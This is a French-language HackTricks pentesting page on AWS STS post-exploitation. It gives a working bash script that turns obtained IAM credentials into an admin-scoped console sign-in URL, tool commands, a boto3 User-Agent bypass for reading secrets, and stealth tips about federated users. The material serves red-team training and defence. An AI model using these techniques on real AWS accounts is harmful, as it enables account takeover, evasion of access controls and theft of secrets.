AWS - STS Post Exploitation

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

STS

Pour plus d’informations :

AWS - IAM, Identity Center & SSO Enum

From IAM Creds to Console

Si vous avez rĂ©ussi Ă  obtenir des IAM credentials, vous pourriez ĂȘtre intĂ©ressĂ© par accessing the web console en utilisant les outils suivants.\ Notez que le user/role doit avoir la permission sts:GetFederationToken.

Script personnalisé

Le script suivant utilisera le profil par défaut et une default AWS location (not gov and not cn) pour vous fournir une signed URL que vous pouvez utiliser pour vous connecter dans le web console:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)


# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Vous pouvez générer un lien vers la console web avec https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Warning

Assurez-vous que l’utilisateur IAM dispose de l’autorisation sts:GetFederationToken, ou fournissez un rîle à assumer.

aws-vault

aws-vault est un outil pour stocker et accéder en toute sécurité aux identifiants AWS dans un environnement de développement.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Note

Vous pouvez aussi utiliser aws-vault pour obtenir une session de console du navigateur

De la console web aux IAM Creds

L’extension de navigateur https://github.com/AI-redteam/clier est capable d’intercepter depuis le rĂ©seau les identifiants IAM avant qu’ils ne soient protĂ©gĂ©s dans la mĂ©moire du navigateur.

Bypass User-Agent restrictions from Python

S’il existe une restriction pour effectuer certaines actions basĂ©e sur le User-Agent utilisĂ© (comme restreindre l’utilisation de la librairie python boto3 en fonction du User-Agent), il est possible d’utiliser la technique prĂ©cĂ©dente pour se connecter Ă  la console web via un navigateur, ou vous pouvez directement modifier le User-Agent de boto3 en faisant :

# Shared by ex16x41
# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client
client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )

# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])

sts:GetFederationToken

Avec cette permission, il est possible de crĂ©er une identitĂ© fĂ©dĂ©rĂ©e pour l’utilisateur qui l’exĂ©cute, limitĂ©e aux permissions dont cet utilisateur dispose.

aws sts get-federation-token --name <username>

Le jeton renvoyĂ© par sts:GetFederationToken appartient Ă  l’identitĂ© fĂ©dĂ©rĂ©e de l’utilisateur appelant, mais avec des autorisations restreintes. MĂȘme si l’utilisateur a des droits d’administrateur, certaines actions telles que lister les IAM users ou attacher des policies ne peuvent pas ĂȘtre effectuĂ©es via le jeton fĂ©dĂ©rĂ©.

De plus, cette mĂ©thode est un peu plus stealthy, puisque l’utilisateur fĂ©dĂ©rĂ© n’apparaĂźt pas dans l’AWS Portal ; il ne peut ĂȘtre observĂ© que via les logs CloudTrail ou des outils de monitoring.

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks